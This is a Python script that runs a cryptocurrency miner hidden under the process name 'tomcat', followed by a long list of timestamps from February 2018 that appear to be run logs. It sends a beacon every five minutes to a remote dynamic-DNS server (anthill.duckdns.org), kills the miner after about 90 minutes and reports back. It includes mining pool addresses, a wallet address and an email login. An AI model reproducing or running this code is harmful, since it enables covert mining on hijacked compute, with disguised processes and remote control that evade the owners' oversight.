import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:52:07.046564
#2018-02-17 16:39:05.031144
#2018-02-17 18:27:01.436094
#2018-02-17 20:16:06.241258
#2018-02-17 22:03:03.848043
#2018-02-17 23:47:04.513548
#2018-02-18 01:38:02.195407
#2018-02-18 03:24:07.000194
#2018-02-18 05:12:05.689498
#2018-02-18 07:04:06.989421
#2018-02-18 08:53:01.224741
#2018-02-18 10:39:07.251774
#2018-02-18 12:24:07.544729
#2018-02-18 14:12:01.665199
#2018-02-18 16:02:04.885669
#2018-02-18 17:53:01.776340
#2018-02-18 19:40:03.843471
#2018-02-18 21:25:07.787692
#2018-02-18 23:14:04.796206
#2018-02-19 01:01:04.983284
#2018-02-19 02:48:01.824243
#2018-02-19 04:33:06.728190
#2018-02-19 06:18:04.918838
#2018-02-19 08:06:06.064884
#2018-02-19 09:56:04.173363
#2018-02-19 11:46:01.362600
#2018-02-19 13:32:01.440740
#2018-02-19 15:22:02.117203
#2018-02-19 17:10:06.958127
#2018-02-19 18:58:07.104312
#2018-02-19 20:44:06.989575
#2018-02-19 22:32:06.152922
#2018-02-20 00:18:01.272689
#2018-02-20 02:05:07.290609
#2018-02-20 03:56:07.130875
#2018-02-20 05:40:06.009740
#2018-02-20 07:26:01.747568
#2018-02-20 09:10:05.651447
#2018-02-20 10:53:01.800479
#2018-02-20 12:39:07.397139
#2018-02-20 14:25:08.048340
#2018-02-20 16:11:01.796196
#2018-02-20 17:56:08.140648
#2018-02-20 19:48:02.119327
#2018-02-20 21:37:06.370621
#2018-02-20 23:20:10.631610
#2018-02-21 01:06:05.839532
#2018-02-21 02:53:06.602165
#2018-02-21 04:43:03.509058
#2018-02-21 06:32:04.854686
#2018-02-21 08:17:01.938410
#2018-02-21 10:03:06.885539
#2018-02-21 11:50:06.997021
#2018-02-21 13:41:07.057872
#2018-02-21 15:24:01.628960
#2018-02-21 17:14:05.990414
#2018-02-21 19:02:08.708241
#2018-02-21 20:50:06.956471
#2018-02-21 22:36:07.596197
#2018-02-22 00:25:07.265488
#2018-02-22 02:13:04.048350
#2018-02-22 03:58:05.625093
#2018-02-22 05:45:06.535399
#2018-02-22 07:32:01.940733
#2018-02-22 09:19:05.492646
#2018-02-22 11:06:07.427337
#2018-02-22 12:53:07.363010
#2018-02-22 14:39:04.068731
#2018-02-22 16:24:09.013823
#2018-02-22 18:11:11.552800
#2018-02-22 20:01:09.327228
#2018-02-22 21:50:07.325001
#2018-02-22 23:37:01.428407
#2018-02-23 01:24:06.447880
#2018-02-23 03:11:08.073617
#2018-02-23 04:57:01.957804
#2018-02-23 06:43:01.987928
#2018-02-23 08:33:05.225865
#2018-02-23 10:48:09.435609
#2018-02-23 12:44:09.965874
#2018-02-23 14:29:05.538452
#2018-02-23 16:19:08.189411
#2018-02-23 18:06:08.925423
#2018-02-23 19:51:04.571738
#2018-02-23 21:34:03.901047
#2018-02-23 23:21:03.995458
#2018-02-24 01:13:05.432336
#2018-02-24 03:03:07.344035
#2018-02-24 04:49:04.696325
#2018-02-24 06:33:06.968798
#2018-02-24 08:22:06.057217
#2018-02-24 10:06:01.287523
#2018-02-24 12:03:06.044720
#2018-02-24 13:51:04.375450
#2018-02-24 15:40:07.690233
#2018-02-24 17:34:01.437720
#2018-02-24 19:20:07.456198
#2018-02-24 21:10:08.117026
#2018-02-25 01:10:03.831856
#2018-02-25 04:51:05.411841
#2018-02-25 08:13:01.598228